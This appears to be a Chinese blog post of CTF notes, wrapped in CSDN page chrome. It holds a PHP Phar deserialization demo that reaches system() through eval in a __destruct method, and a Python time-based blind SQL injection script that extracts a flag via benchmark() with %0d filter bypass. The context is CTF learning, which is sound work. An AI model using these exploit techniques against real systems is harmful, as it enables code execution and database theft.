2022/05/28

telnet和ping的区别

ping用来检测网络连接速度
telnet用来探测指定IP的端口的端口是否开放

Phar反序列化

在Windows上测试

<?php
class Test{
    public $cmd="system('notepad');";
}
$p = new Test();
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
<?php
class Test{
    public $cmd;
    function __destruct()
    {
        eval($this->cmd);
    }
}
include('phar://test.phar');
?>

Dest0g3 520迎新赛

Really Easy SQL

import requests
from time import sleep
from urllib import parse

url = "http://4336862f-ec25-46da-83df-64b1d941d1ee.node4.buuoj.cn:81/"

for mid in range(1,100):
    for i in range(1,144):
        sleep(0.1)
        data = {
            'username':parse.unquote("'%%0dor%%0dif((select%%0dascii(mid((cmd),%d,1))%%0dfrom%%0dflaggg%%0dlimit%%0d0,1)=%d,benchmark(5000000,sha(1)),1)%%0dor%%0d'" % (mid, i)),
            'password':"123"}
        result = requests.post(url,data=data)
        if result.elapsed.total_seconds() > 4:
            print(chr(i))
            break
        if i > 140:
            exit("修改limit吧")
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值